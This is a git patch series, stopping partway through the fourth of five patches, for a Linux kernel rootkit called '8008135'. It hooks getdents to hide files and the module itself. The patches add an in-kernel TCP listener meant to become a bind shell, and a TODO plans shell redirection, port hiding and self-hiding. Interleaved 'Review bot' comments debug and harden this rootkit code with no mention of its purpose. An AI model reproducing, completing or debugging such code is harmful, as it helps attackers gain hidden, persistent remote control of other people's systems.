From 28c40257587b2634c9e2b93c9344a6d67b87f323 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 00:32:36 +0100 Subject: [PATCH 1/5] Adding a Socket Server to the Linux Kernel Module Gone a long way from trying to implement a socket bindshell using the standard C-Libraries (which obv. doesn't work in LKM!), then implementing an ASM-Solution only to find out there are problems with the x86/x32 bit and knowing that I have no clue of how to write ASM, I thought of looking into sockets on linux kernel modules - AAAND found one. So the files: * src/50ck3t.c * src/headers/50ck3t.h are basically from https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git Thanks for sharing! There will prob. be some additions and modifications. Makefile: * Some Stuff had to be renamed in the Makefile due to Renaming src/create_sysgen.sh -> src/cr3473_5y563n.sh & Added src/headers/50ck3t.h, src/50ck3t.c Including src/headers/50ck3t.h in 8008135.c Changing Module License to GPL, somehow GPLv3 was a problem to the compiler because of do_exit --- Makefile | 5 +- src/50ck3t.c | 558 +++++++++++++++++++++ src/8008135.c | 7 +- src/{create_sysgen.sh => cr3473_5y563n.sh} | 2 +- src/headers/50ck3t.h | 50 ++ src/headers/8008135.h | 4 +- 6 files changed, 619 insertions(+), 7 deletions(-) create mode 100644 src/50ck3t.c rename src/{create_sysgen.sh => cr3473_5y563n.sh} (89%) create mode 100644 src/headers/50ck3t.h diff --git a/Makefile b/Makefile index b18503c..255fc67 100644 --- a/Makefile +++ b/Makefile @@ -19,12 +19,13 @@ INCL_H := $(PWD)/$(INCL_S)/headers obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o +$(MNAME)-y += src/50ck3t.o # Includes for header files etc ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) all: - $(shell $(SRCS_S)/create_sysgen.sh) + $(shell $(SRCS_S)/cr3473_5y563n.sh) $(MAKE) -C $(BUILDDIR) M=$(PWD) modules load: 
@@ -34,5 +35,5 @@ unload: rmmod $(MNAME) clean: - -rm $(SRCS_H)/sysgen.h + -rm $(SRCS_H)/5y563n.h $(MAKE) -C $(BUILDDIR) M=$(PWD) clean diff --git a/src/50ck3t.c b/src/50ck3t.c new file mode 100644 index 0000000..aace8b3 --- /dev/null +++ b/src/50ck3t.c 
@@ -0,0 +1,558 @@ +/* + * + * NOTE: + * this is basically this guys code: + * https://github.com/abysamross/simple-linux-kernel-tcp-client-server.git + * his last update was 4 years ago, so there might be some changes, + * there definitely will be some regarding the data received/sent back since + * this is will be used as a bindshell + * but base is his work. + * + */ + +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . 
+ */ +/**** includes ***************************************************************** +*******************************************************************************/ +#include "50ck3t.h" + +/**** types ******************************************************************* +*******************************************************************************/ +struct tcp_conn_handler_data{ + struct sockaddr_in *address; + struct socket *accept_socket; + int thread_id; +}; + +struct tcp_conn_handler{ + struct tcp_conn_handler_data *data[MAX_CONNS]; + struct task_struct *thread[MAX_CONNS]; + int tcp_conn_handler_stopped[MAX_CONNS]; +}; + +struct tcp_conn_handler *tcp_conn_handler; + + +struct tcp_server_service{ + int running; + struct socket *listen_socket; + struct task_struct *thread; + struct task_struct *accept_thread; +}; + +struct tcp_server_service *tcp_server; + + + +/**** var ********************************************************************** +*******************************************************************************/ +int tcp_listener_stopped = 0; +int tcp_acceptor_stopped = 0; + + +char *inet_ntoa(struct in_addr *in){ + char *str_ip = NULL; + u_int32_t int_ip = 0; + + str_ip = kmalloc(16 * sizeof(char), GFP_KERNEL); + + if(!str_ip) + return NULL; + else + memset(str_ip, 0, 16); + + int_ip = in->s_addr; + + sprintf(str_ip, "%d.%d.%d.%d", (int_ip) & 0xFF, (int_ip >> 8) & 0xFF, + (int_ip >> 16) & 0xFF, (int_ip >> 16) & 0xFF); + + return str_ip; +} + +int tcp_server_send(struct socket *sock, int id, const char *buf,\ + const size_t length, unsigned long flags){ + struct msghdr msg; + struct kvec vec; + int len, written = 0, left =length; + mm_segment_t oldmm; + + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_control = NULL; + msg.msg_controllen = 0; + msg.msg_flags = flags; + msg.msg_flags = 0; + + oldmm = get_fs(); set_fs(KERNEL_DS); + +repeat_send: + vec.iov_len = left; + vec.iov_base = (char *)buf + written; + + len = kernel_sendmsg(sock, &msg, &vec, 
left, left); + + if((len == -ERESTARTSYS) || (!(flags & MSG_DONTWAIT) &&\ + (len == -EAGAIN))) + goto repeat_send; + + if(len > 0){ + written += len; + left -= len; + if(left) + goto repeat_send; + } + + set_fs(oldmm); + return written?written:len; +} + +int tcp_server_receive(struct socket *sock, int id,struct sockaddr_in *address,\ + unsigned char *buf,int size, unsigned long flags){ + struct msghdr msg; + struct kvec vec; + int len; + char *tmp = NULL; + + if(sock==NULL){ + pr_info(" *** mtp | tcp server receive socket is NULL| " + " tcp_server_receive *** \n"); + return -1; + } + + msg.msg_name = 0; + msg.msg_namelen = 0; + msg.msg_control = NULL; + msg.msg_controllen = 0; + msg.msg_flags = flags; + + vec.iov_len = size; + vec.iov_base = buf; + +read_again: + if(!skb_queue_empty(&sock->sk->sk_receive_queue)) + pr_info("recv queue empty ? %s \n", + skb_queue_empty(&sock->sk->sk_receive_queue)?"yes":"no"); + + len = kernel_recvmsg(sock, &msg, &vec, size, size, flags); + + if(len == -EAGAIN || len == -ERESTARTSYS) + goto read_again; + + tmp = inet_ntoa(&(address->sin_addr)); + + pr_info("client-> %s:%d, says: %s\n", tmp, ntohs(address->sin_port), buf); + + kfree(tmp); + //len = msg.msg_iter.kvec->iov_len; + return len; +} + +int connection_handler(void *data){ + struct tcp_conn_handler_data *conn_data = + (struct tcp_conn_handler_data *)data; + + struct sockaddr_in *address = conn_data->address; + struct socket *accept_socket = conn_data->accept_socket; + int id = conn_data->thread_id; + + int ret; + int len = 49; + unsigned char in_buf[len+1]; + unsigned char out_buf[len+1]; + + + DECLARE_WAITQUEUE(recv_wait, current); + allow_signal(SIGKILL|SIGSTOP); + + while(1){ + add_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + + while(skb_queue_empty(&accept_socket->sk->sk_receive_queue)){ + __set_current_state(TASK_INTERRUPTIBLE); + schedule_timeout(HZ); + + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server handle connection " + "thread stopped | 
connection_handler *** \n"); + + //tcp_conn_handler->thread[id] = NULL; + tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; + + __set_current_state(TASK_RUNNING); + remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + &recv_wait); + kfree(tcp_conn_handler->data[id]->address); + kfree(tcp_conn_handler->data[id]); + sock_release(tcp_conn_handler->data[id]->accept_socket); + return 0; + } + + if(signal_pending(current)){ + __set_current_state(TASK_RUNNING); + remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + &recv_wait); + goto out; + } + } + __set_current_state(TASK_RUNNING); + remove_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + + + pr_info("receiving message\n"); + memset(in_buf, 0, len+1); + ret = tcp_server_receive(accept_socket, id, address, in_buf, len,\ + MSG_DONTWAIT); + if(ret > 0){ + if(memcmp(in_buf, "HOLA", 4) == 0){ + memset(out_buf, 0, len+1); + strcat(out_buf, "HOLASI"); + pr_info("sending response: %s\n", out_buf); + tcp_server_send(accept_socket, id, out_buf,\ + strlen(out_buf), MSG_DONTWAIT); + } + /* + tmp = inet_ntoa(&(address->sin_addr)); + pr_info("connection handler: %d of: %s %d done sending " + " HOLASI\n", id, tmp, ntohs(address->sin_port)); + kfree(tmp); + */ + if(memcmp(in_buf, "ADIOS", 5) == 0){ + memset(out_buf, 0, len+1); + strcat(out_buf, "ADIOSAMIGO"); + pr_info("sending response: %s\n", out_buf); + tcp_server_send(accept_socket, id, out_buf,\ + strlen(out_buf), MSG_DONTWAIT); + break; + } + } + } + +out: + /* + tmp = inet_ntoa(&(address->sin_addr)); + + pr_info("connection handler: %d of: %s %d exiting normally\n", + id, tmp, ntohs(address->sin_port)); + kfree(tmp); + */ + tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; + kfree(tcp_conn_handler->data[id]->address); + kfree(tcp_conn_handler->data[id]); + sock_release(tcp_conn_handler->data[id]->accept_socket); + //spin_lock(&tcp_server_lock); + tcp_conn_handler->thread[id] = NULL; + //spin_unlock(&tcp_server_lock); + //return 0; + do_exit(0); +} + +int 
tcp_server_accept(void){ + int accept_err = 0; + struct socket *socket; + struct socket *accept_socket = NULL; + struct inet_connection_sock *isock; + int id = 0; + DECLARE_WAITQUEUE(accept_wait, current); + allow_signal(SIGKILL|SIGSTOP); + socket = tcp_server->listen_socket; + pr_info(" *** mtp | creating the accept socket | tcp_server_accept " + "*** \n"); + + while(1){ + struct tcp_conn_handler_data *data = NULL; + struct sockaddr_in *client = NULL; + char *tmp; + int addr_len; + + accept_err = + sock_create(socket->sk->sk_family, socket->type,\ + socket->sk->sk_protocol, &accept_socket); + + if(accept_err < 0 || !accept_socket){ + pr_info(" *** mtp | accept_error: %d while creating " + "tcp server accept socket | " + "tcp_server_accept *** \n", accept_err); + goto err; + } + + accept_socket->type = socket->type; + accept_socket->ops = socket->ops; + + isock = inet_csk(socket->sk); + + + add_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); + while(reqsk_queue_empty(&isock->icsk_accept_queue)){ + __set_current_state(TASK_INTERRUPTIBLE); + schedule_timeout(HZ); + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server acceptor thread " + "stopped | tcp_server_accept *** \n"); + tcp_acceptor_stopped = 1; + __set_current_state(TASK_RUNNING); + remove_wait_queue(&socket->sk->sk_wq->wait,\ + &accept_wait); + sock_release(accept_socket); + return 0; + } + + if(signal_pending(current)){ + __set_current_state(TASK_RUNNING); + remove_wait_queue(&socket->sk->sk_wq->wait,\ + &accept_wait); + goto release; + } + + } + __set_current_state(TASK_RUNNING); + remove_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); + + pr_info("accept connection\n"); + + accept_err = + socket->ops->accept(socket, accept_socket, O_NONBLOCK); + + if(accept_err < 0){ + pr_info(" *** mtp | accept_error: %d while accepting " + "tcp server | tcp_server_accept *** \n", + accept_err); + goto release; + } + + client = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL); + memset(client, 0, 
sizeof(struct sockaddr_in)); + + addr_len = sizeof(struct sockaddr_in); + + accept_err = + accept_socket->ops->getname(accept_socket,\ + (struct sockaddr *)client,\ + &addr_len, 2); + + if(accept_err < 0){ + pr_info(" *** mtp | accept_error: %d in getname " + "tcp server | tcp_server_accept *** \n", + accept_err); + goto release; + } + + + tmp = inet_ntoa(&(client->sin_addr)); + + pr_info("connection from: %s %d \n", + tmp, ntohs(client->sin_port)); + + kfree(tmp); + + pr_info("handle connection\n"); + + + for(id = 0; id < MAX_CONNS; id++){ + if(tcp_conn_handler->thread[id] == NULL) + break; + } + + pr_info("gave free id: %d\n", id); + + if(id == MAX_CONNS) + goto release; + + data = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL); + memset(data, 0, sizeof(struct tcp_conn_handler_data)); + + data->address = client; + data->accept_socket = accept_socket; + data->thread_id = id; + + tcp_conn_handler->tcp_conn_handler_stopped[id] = 0; + tcp_conn_handler->data[id] = data; + tcp_conn_handler->thread[id] = + kthread_run((void *)connection_handler, (void *)data, MODULE_NAME); + + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server acceptor thread stopped" + " | tcp_server_accept *** \n"); + tcp_acceptor_stopped = 1; + return 0; + } + + if(signal_pending(current)){ + break; + } + + } + + + tcp_acceptor_stopped = 1; + do_exit(0); +release: + sock_release(accept_socket); +err: + tcp_acceptor_stopped = 1; + do_exit(0); +} + +int tcp_server_listen(void) +{ + int server_err; + struct socket *conn_socket; + struct sockaddr_in server; + + DECLARE_WAIT_QUEUE_HEAD(wq); + + allow_signal(SIGKILL|SIGTERM); + + server_err = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\ + &tcp_server->listen_socket); + if(server_err < 0){ + pr_info(" *** mtp | Error: %d while creating tcp server " + "listen socket | tcp_server_listen *** \n", server_err); + goto err; + } + + conn_socket = tcp_server->listen_socket; + tcp_server->listen_socket->sk->sk_reuse = 1; + + 
server.sin_addr.s_addr = INADDR_ANY; + server.sin_family = AF_INET; + server.sin_port = htons(DEFAULT_PORT); + + server_err = + conn_socket->ops->bind(conn_socket, (struct sockaddr*)&server,\ + sizeof(server)); + + if(server_err < 0){ + pr_info(" *** mtp | Error: %d while binding tcp server " + "listen socket | tcp_server_listen *** \n", server_err); + goto release; + } + + server_err = conn_socket->ops->listen(conn_socket, 16); + + if(server_err < 0){ + pr_info(" *** mtp | Error: %d while listening in tcp " + "server listen socket | tcp_server_listen " + "*** \n", server_err); + goto release; + } + + tcp_server->accept_thread = + kthread_run((void*)tcp_server_accept, NULL, MODULE_NAME); + + while(1){ + wait_event_timeout(wq, 0, 3*HZ); + + if(kthread_should_stop()){ + pr_info(" *** mtp | tcp server listening thread" + " stopped | tcp_server_listen *** \n"); + return 0; + } + + if(signal_pending(current)) + goto release; + } + + + sock_release(conn_socket); + tcp_listener_stopped = 1; + do_exit(0); +release: + sock_release(conn_socket); +err: + tcp_listener_stopped = 1; + do_exit(0); +} + +int tcp_server_start(void){ + tcp_server->running = 1; + tcp_server->thread = kthread_run((void *)tcp_server_listen, NULL,\ + MODULE_NAME); + return 0; +} + +int network_server_init(void){ + pr_info(" *** mtp | network_server initiated | " + "network_server_init ***\n"); + tcp_server = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL); + memset(tcp_server, 0, sizeof(struct tcp_server_service)); + + tcp_conn_handler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL); + memset(tcp_conn_handler, 0, sizeof(struct tcp_conn_handler)); + + tcp_server_start(); + return 0; +} + +void network_server_exit(void){ + int ret; + int id; + + if(tcp_server->thread == NULL) + pr_info(" *** mtp | No kernel thread to kill | " + "network_server_exit *** \n"); + else + { + for(id = 0; id < MAX_CONNS; id++) + { + if(tcp_conn_handler->thread[id] != NULL) + { + + 
if(!tcp_conn_handler->tcp_conn_handler_stopped[id]) + { + ret = + kthread_stop(tcp_conn_handler->thread[id]); + + if(!ret) + pr_info(" *** mtp | tcp server " + "connection handler thread: %d " + "stopped | network_server_exit " + "*** \n", id); + } + } + } + + if(!tcp_acceptor_stopped) + { + ret = kthread_stop(tcp_server->accept_thread); + if(!ret) + pr_info(" *** mtp | tcp server acceptor thread" + " stopped | network_server_exit *** \n"); + } + + if(!tcp_listener_stopped) + { + ret = kthread_stop(tcp_server->thread); + if(!ret) + pr_info(" *** mtp | tcp server listening thread" + " stopped | network_server_exit *** \n"); + } + + + if(tcp_server->listen_socket != NULL && !tcp_listener_stopped) + { + sock_release(tcp_server->listen_socket); + tcp_server->listen_socket = NULL; + } + + kfree(tcp_conn_handler); + kfree(tcp_server); + tcp_server = NULL; + } + +} diff --git a/src/8008135.c b/src/8008135.c index cf253f5..e8f42be 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -20,6 +20,7 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" +#include "50ck3t.h" /**** var ******************************************************************** *******************************************************************************/ @@ -33,7 +34,7 @@ sys_getdents_t sys_getdents_orig = NULL; *******************************************************************************/ asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, - unsigned int count) { + unsigned int count){ int boff; struct linux_dirent* ent; 
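Review bot: connection_handler frees `tcp_conn_handler->data[id]` and then reads `tcp_conn_handler->data[id]->accept_socket` for the sock_release that follows, both in the kthread_should_stop branch and after the `out:` label, which is a use-after-free; the local `accept_socket` and `address` copies already hold those pointers, so release the socket first and free afterwards, as in the fence below (the stop branch needs the same ordering). inet_ntoa shifts by 16 for both the third and the fourth octet, so the last octet printed is wrong (`(int_ip >> 24) & 0xFF`), and the kernel's `%pI4` printk specifier would format the address with no kmalloc at all; the function is also non-static and reuses a well-known libc name. tcp_server_send sets `msg.msg_flags = flags` and immediately overwrites it with `msg.msg_flags = 0`, so the caller's MSG_DONTWAIT never reaches kernel_sendmsg — drop the second assignment. In tcp_server_accept neither `client` nor `data` is checked after kmalloc, and the `id == MAX_CONNS` path jumps to `release` without freeing `client`. The `getname` call with `&addr_len, 2` and the three-argument `ops->accept` match an older in-kernel socket API; the kernel version this is built against is not visible here, so that should be confirmed against the build tree.
```c
out:
	tcp_conn_handler->tcp_conn_handler_stopped[id] = 1;
	/* tear down through the local copies: data[id] is freed below */
	sock_release(accept_socket);
	kfree(address);
	kfree(tcp_conn_handler->data[id]);
	tcp_conn_handler->data[id] = NULL;
	tcp_conn_handler->thread[id] = NULL;
	do_exit(0);
```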
@@ -54,7 +55,7 @@ asmlinkage long sys_getdents_new(unsigned int fd, // if it has hide prefix or module name anywhere, hide it if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) - || (strstr(ent->d_name, MODULE_NAME) != NULL)) { + || (strstr(ent->d_name, MODULE_NAME) != NULL)) { #if defined DEBUG printk("\n hide prefix or mod name contained!\n"); printk("\n ret %ld\n ", ret); @@ -107,6 +108,7 @@ static int __init init_8008135(void) { write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "New syscall in place\n"); + network_server_init(); return 0; } @@ -118,6 +120,7 @@ static int __init init_8008135(void) { * RETURNS: - *******************************************************************************/ static void __exit exit_8008135(void) { + network_server_exit(); // allow us to write to read onlu pages write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); // set getdents handler back diff --git a/src/create_sysgen.sh b/src/cr3473_5y563n.sh similarity index 89% rename from src/create_sysgen.sh rename to src/cr3473_5y563n.sh index 50c4126..17d133d 100755 --- a/src/create_sysgen.sh +++ b/src/cr3473_5y563n.sh @@ -1,7 +1,7 @@ #!/usr/bin/env bash SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" SRCS_H="$SCRIPTPATH""/headers" -SGENH="$SRCS_H""/sysgen.h" +SGENH="$SRCS_H""/5y563n.h" smap="/boot/System.map-$(uname -r)" diff --git a/src/headers/50ck3t.h b/src/headers/50ck3t.h new file mode 100644 index 0000000..b9c7b35 --- /dev/null +++ b/src/headers/50ck3t.h 
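Review bot: The return value of `network_server_init()` is discarded in init_8008135 (hunk -107,6), and the function as added in src/50ck3t.c returns 0 even when its two kmalloc calls fail, so an allocation failure would be dereferenced in tcp_server_start with no way for module load to fail cleanly. Have network_server_init check both allocations and return -ENOMEM, and check it here, e.g. `ret = network_server_init(); if (ret) { /* undo the handler swap done above */ return ret; }`. The beginning of init_8008135, where the original handler is saved and replaced, lies outside the hunk, so the exact undo sequence is not visible here. In exit_8008135 (hunk -118,6) calling network_server_exit() before the handler is restored looks right, since the listener, acceptor and connection threads must be stopped before the module's code is unloaded.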
@@ -0,0 +1,50 @@ +/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */ +/* + * main.c + * Copyright (C) 2019 + * + * 8008135 is free software: you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * 8008135 is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program. If not, see . + */ +#ifndef SRC_HEADERS_50CK3T_H_ +#define SRC_HEADERS_50CK3T_H_ + +/**** includes ***************************************************************** +*******************************************************************************/ +#include +#include +#include + +#include +#include + +#include +#include +#include + +#include +#include + +#include +#include +#include +#include + +#define DEFAULT_PORT 2325 +#define MAX_CONNS 16 +#define MODULE_NAME "8008135" + +int network_server_init(void); +void network_server_exit(void); + +#endif /* SRC_HEADERS_50CK3T_H_ */ diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 82df99e..c81cdf3 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -26,7 +26,7 @@ #include #include #include -#include "sysgen.h" +#include "5y563n.h" /**** Defines ***************************************************************** @@ -44,7 +44,7 @@ /**** Modinfo **************************************************************** *******************************************************************************/ -MODULE_LICENSE("GPLv3"); +MODULE_LICENSE("GPL"); MODULE_AUTHOR("JanKoernerEnterprises"); MODULE_DESCRIPTION("8008135"); MODULE_VERSION("0.1"); 
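Review bot: `MODULE_NAME` is defined here as "8008135", yet src/8008135.c already used `MODULE_NAME` in its getdents hook before this commit added the include of 50ck3t.h, so the macro presumably exists in 8008135.h as well; an identical redefinition compiles, but a later change to one copy would silently diverge, so keep a single definition (drop it here, or guard it with `#ifndef MODULE_NAME`). The header comment still names the file `main.c`, and `DEFAULT_PORT` and `MAX_CONNS` have no comment saying what they bound; a one-line comment per macro, e.g. `/* upper bound on concurrently handled connections; sizes the per-connection thread/data arrays in 50ck3t.c */` for MAX_CONNS, would help the next reader.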
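Review bot: Replacing `MODULE_LICENSE("GPLv3")` with `"GPL"` (hunk -44,7) is the correct string, since "GPLv3" is not one of the license identifiers the kernel's GPL-compatibility check recognises, which is why GPL-only exports such as do_exit were refused at link time. The commit message shows the change was driven by do_exit, though, and the kthread documentation says a thread function should return its status rather than call do_exit, so that kthread_stop can collect the result and the kthread wrapper can finish its own cleanup; with a plain `return 0;` at those sites the license string would not have been the blocker. Those call sites are in src/50ck3t.c, not in this hunk.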
From 6306de623413e0400d16697811a92f7bd767aa7b Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 00:44:19 +0100 Subject: [PATCH 2/5] Adding TODO file --- TODO | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100644 TODO diff --git a/TODO b/TODO new file mode 100644 index 0000000..77327fd --- /dev/null +++ b/TODO @@ -0,0 +1,10 @@ +# Pick One +## TCP Socket +* Add binding to shell: + * Incoming commands have to be redir to bash + * STDOUT, STDIN, STDERR Handling + * Remove chat, debug stuff +* Hide open Port + +## Module +* Hide itself From 24a629d7e88bff9547690355fee5aaf67200115e Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 00:46:13 +0100 Subject: [PATCH 3/5] Renaming TODO to TODO.md for online markdown support --- TODO => TODO.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename TODO => TODO.md (100%) diff --git a/TODO b/TODO.md similarity index 100% rename from TODO rename to TODO.md From 3abccec17edf00ba3d4ce8b863157394a78e796b Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Fri, 22 Nov 2019 16:40:18 +0100 Subject: [PATCH 4/5] Refactoring --- src/50ck3t.c | 432 +++++++++++++++++++++++++-------------------------- 1 file changed, 209 insertions(+), 223 deletions(-) diff --git a/src/50ck3t.c b/src/50ck3t.c index aace8b3..9302803 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c @@ -35,9 +35,9 @@ /**** types ******************************************************************* *******************************************************************************/ struct tcp_conn_handler_data{ - struct sockaddr_in *address; - struct socket *accept_socket; - int thread_id; + struct sockaddr_in *FAddress; + struct socket *FAcceptSocket; + int FThreadID; }; struct tcp_conn_handler{ 
@@ -46,144 +46,146 @@ struct tcp_conn_handler{ int tcp_conn_handler_stopped[MAX_CONNS]; }; -struct tcp_conn_handler *tcp_conn_handler; +struct tcp_conn_handler *STCPConnHandler; struct tcp_server_service{ - int running; - struct socket *listen_socket; - struct task_struct *thread; - struct task_struct *accept_thread; + int FRunning; + struct socket *FListenSocket; + struct task_struct *FThread; + struct task_struct *FAccpeptThread; }; -struct tcp_server_service *tcp_server; +struct tcp_server_service *FTCPServer_Service; /**** var ********************************************************************** *******************************************************************************/ -int tcp_listener_stopped = 0; -int tcp_acceptor_stopped = 0; +static int STCPListenerStopped = 0; +static int STCPAcceptorStopped = 0; -char *inet_ntoa(struct in_addr *in){ - char *str_ip = NULL; - u_int32_t int_ip = 0; +char *inet_ntoa(struct in_addr *AInAddr){ + char *LIPAddr = NULL; + u_int32_t LIPInt = 0; - str_ip = kmalloc(16 * sizeof(char), GFP_KERNEL); + LIPAddr = kmalloc(16 * sizeof(char), GFP_KERNEL); - if(!str_ip) + if(!LIPAddr) return NULL; else - memset(str_ip, 0, 16); + memset(LIPAddr, 0, 16); - int_ip = in->s_addr; + LIPInt = AInAddr->s_addr; - sprintf(str_ip, "%d.%d.%d.%d", (int_ip) & 0xFF, (int_ip >> 8) & 0xFF, - (int_ip >> 16) & 0xFF, (int_ip >> 16) & 0xFF); + sprintf(LIPAddr, "%d.%d.%d.%d", (LIPInt) & 0xFF, (LIPInt >> 8) & 0xFF, + (LIPInt >> 16) & 0xFF, (LIPInt >> 16) & 0xFF); - return str_ip; + return LIPAddr; } -int tcp_server_send(struct socket *sock, int id, const char *buf,\ - const size_t length, unsigned long flags){ - struct msghdr msg; - struct kvec vec; - int len, written = 0, left =length; - mm_segment_t oldmm; +int tcp_server_send(struct socket *ASocket, int AID, const char *ABuf,\ + const size_t ALength, unsigned long AFlags){ + struct msghdr LMsgHeader; + struct kvec LVec; + int LLen, LWritten, LLeft; + mm_segment_t LOldMM; - msg.msg_name = 0; - 
msg.msg_namelen = 0; - msg.msg_control = NULL; - msg.msg_controllen = 0; - msg.msg_flags = flags; - msg.msg_flags = 0; + LWritten = 0; + LLeft = ALength; - oldmm = get_fs(); set_fs(KERNEL_DS); + LMsgHeader.msg_name = 0; + LMsgHeader.msg_namelen = 0; + LMsgHeader.msg_control = NULL; + LMsgHeader.msg_controllen = 0; + LMsgHeader.msg_flags = AFlags; + LMsgHeader.msg_flags = 0; + + LOldMM = get_fs(); set_fs(KERNEL_DS); repeat_send: - vec.iov_len = left; - vec.iov_base = (char *)buf + written; + LVec.iov_len = LLeft; + LVec.iov_base = (char *)ABuf + LWritten; - len = kernel_sendmsg(sock, &msg, &vec, left, left); + LLen = kernel_sendmsg(ASocket, &LMsgHeader, &LVec, LLeft, LLeft); - if((len == -ERESTARTSYS) || (!(flags & MSG_DONTWAIT) &&\ - (len == -EAGAIN))) + if((LLen == -ERESTARTSYS) || (!(AFlags & MSG_DONTWAIT) &&\ + (LLen == -EAGAIN))) goto repeat_send; - if(len > 0){ - written += len; - left -= len; - if(left) + if(LLen > 0){ + LWritten += LLen; + LLeft -= LLen; + if(LLeft) goto repeat_send; } - set_fs(oldmm); - return written?written:len; + set_fs(LOldMM); + return LWritten?LWritten:LLen; } -int tcp_server_receive(struct socket *sock, int id,struct sockaddr_in *address,\ - unsigned char *buf,int size, unsigned long flags){ - struct msghdr msg; - struct kvec vec; - int len; - char *tmp = NULL; +int tcp_server_receive(struct socket *ASock, int AID,struct sockaddr_in *AAddress,\ + unsigned char *ABuf,int ASize, unsigned long AFlags){ + struct msghdr LMsgHeader; + struct kvec LVec; + int LLen; + char *LTmp = NULL; - if(sock==NULL){ + if(ASock==NULL){ pr_info(" *** mtp | tcp server receive socket is NULL| " " tcp_server_receive *** \n"); return -1; } - msg.msg_name = 0; - msg.msg_namelen = 0; - msg.msg_control = NULL; - msg.msg_controllen = 0; - msg.msg_flags = flags; + LMsgHeader.msg_name = 0; + LMsgHeader.msg_namelen = 0; + LMsgHeader.msg_control = NULL; + LMsgHeader.msg_controllen = 0; + LMsgHeader.msg_flags = AFlags; - vec.iov_len = size; - vec.iov_base = buf; + 
LVec.iov_len = ASize; + LVec.iov_base = ABuf; read_again: - if(!skb_queue_empty(&sock->sk->sk_receive_queue)) + if(!skb_queue_empty(&ASock->sk->sk_receive_queue)) pr_info("recv queue empty ? %s \n", - skb_queue_empty(&sock->sk->sk_receive_queue)?"yes":"no"); + skb_queue_empty(&ASock->sk->sk_receive_queue)?"yes":"no"); - len = kernel_recvmsg(sock, &msg, &vec, size, size, flags); + LLen = kernel_recvmsg(ASock, &LMsgHeader, &LVec, ASize, ASize, AFlags); - if(len == -EAGAIN || len == -ERESTARTSYS) + if(LLen == -EAGAIN || LLen == -ERESTARTSYS) goto read_again; - tmp = inet_ntoa(&(address->sin_addr)); + LTmp = inet_ntoa(&(AAddress->sin_addr)); - pr_info("client-> %s:%d, says: %s\n", tmp, ntohs(address->sin_port), buf); + pr_info("client-> %s:%d, says: %s\n", LTmp, ntohs(AAddress->sin_port), ABuf); - kfree(tmp); - //len = msg.msg_iter.kvec->iov_len; - return len; + kfree(LTmp); + return LLen; } -int connection_handler(void *data){ - struct tcp_conn_handler_data *conn_data = - (struct tcp_conn_handler_data *)data; +int connection_handler(void *AData){ + struct tcp_conn_handler_data *LConnData = + (struct tcp_conn_handler_data *)AData; - struct sockaddr_in *address = conn_data->address; - struct socket *accept_socket = conn_data->accept_socket; - int id = conn_data->thread_id; + struct sockaddr_in *LAddress = LConnData->FAddress; + struct socket *LAcceptSocket = LConnData->FAcceptSocket; + int LID = LConnData->FThreadID; - int ret; - int len = 49; - unsigned char in_buf[len+1]; - unsigned char out_buf[len+1]; + int LRet; + int LLen = 49; + unsigned char LInBuf[LLen+1]; + unsigned char LOutBuf[LLen+1]; DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); while(1){ - add_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + add_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait); - while(skb_queue_empty(&accept_socket->sk->sk_receive_queue)){ + 